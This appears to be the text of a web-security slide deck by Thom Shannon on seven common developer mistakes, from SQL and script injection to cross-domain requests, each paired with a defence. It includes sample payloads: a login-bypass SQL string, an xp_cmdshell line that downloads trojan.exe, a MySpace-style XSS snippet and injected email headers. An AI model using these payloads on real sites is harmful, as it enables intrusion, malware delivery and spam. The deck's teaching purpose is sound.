Thom Shannon – Glow New Media

7 SINS OF A COMPLACENT WEB DEVELOPER SQL Injection JavaScript Injection Cookie Injection Email Injection File Uploads Cross domain form submission Cross domain JSON APIs

SQL Injection

JavaScript Injection

Cookie Injection

Email Injection

File Uploads

Cross domain form submission

Cross domain JSON APIs

SELECT * FROM [User] WHERE [Name] = ‘ admin ’ AND [Password] = ‘ secret ’

SELECT * FROM [User] WHERE

[Name] = ‘ admin ’

AND

[Password] = ‘ secret ’

SELECT * FROM [User] WHERE [Name] = ‘ admin ’ AND [Password] = ‘ ’ or true; -- ’

SELECT * FROM [User] WHERE

[Name] = ‘ admin ’

AND

[Password] = ‘ ’ or true; -- ’

SELECT * FROM [Page] WHERE [Title] = ‘ Home’; exec xp_cmdshell(‘ftp host trojan.exe’)’ -- ’

SELECT * FROM [Page] WHERE

[Title] = ‘ Home’; exec xp_cmdshell(‘ftp host trojan.exe’)’ -- ’

Validate ALL possible inputs Escape Quotes! Use strongly typed/parameter queries Can affect many platforms ASP .Net PHP ...

Validate ALL possible inputs

Escape Quotes!

Use strongly typed/parameter queries

Can affect many platforms

ASP

.Net

PHP

...

MYSPACE WORM <div id=&quot;mycode&quot; expr=&quot;alert(‘pwnd!’)&quot; style=&quot;background:url('java script:eval(document.all.mycode.expr)')&quot;>

<div id=&quot;mycode&quot; expr=&quot;alert(‘pwnd!’)&quot; style=&quot;background:url('java script:eval(document.all.mycode.expr)')&quot;>

DEFAULT DENY Strip all HTML Use a simple markup like Textile Validate ALL inputs

Strip all HTML

Use a simple markup like Textile

Validate ALL inputs

BAD COOKIES loggedon=false Userid=78 permissionlevel=1

loggedon=false

Userid=78

permissionlevel=1

Store important data on server Use a token Do not trust anything sent from the client

Store important data on server

Use a token

Do not trust anything sent from the client

Used by Spammers From: [email_address] Cc:spamee@gmail.com, poorsap@hotmail.com Subject: Buy [Drugs|Viagra|Stocks]

Used by Spammers

From: [email_address]

Cc:spamee@gmail.com, poorsap@hotmail.com

Subject: Buy [Drugs|Viagra|Stocks]

Validate email addresses and other content Don’t put user input in mail headers

Validate email addresses and other content

Don’t put user input in mail headers

/uploads/runSpamEngine.php /uploads/downloadDb.aspx /uploads/crashBox.exe

/uploads/runSpamEngine.php

/uploads/downloadDb.aspx

/uploads/crashBox.exe

SysAdmin can remove execution permissions Web Developer can validate too Always use DEFAULT DENY (whitelist)

SysAdmin can remove execution permissions

Web Developer can validate too

Always use DEFAULT DENY (whitelist)

Post from attackers site to logged in site Action purchases Change profile page Use hidden frame to keep posting

Post from attackers site to logged in site

Action purchases

Change profile page

Use hidden frame to keep posting

Pass a token with the form Confirm destructive actions 307 redirect in Internet Explorer

Pass a token with the form

Confirm destructive actions

307 redirect in Internet Explorer

AJAX friendly APIs JavaScript blog widgets Called using SCRIPT elements Can cause actions or reveal private data

AJAX friendly APIs

JavaScript blog widgets

Called using SCRIPT elements

Can cause actions or reveal private data

Client side code is always insecure Authenticate with query string Track using API application key

Client side code is always insecure

Authenticate with query string

Track using API application key

In Summary Don’t pass the buck, take responsibility Web app exploits are the most common Everyone is a target

Don’t pass the buck, take responsibility

Web app exploits are the most common

Everyone is a target

Thom Shannon www.ts 0 .com

Thom Shannon

www.ts 0 .com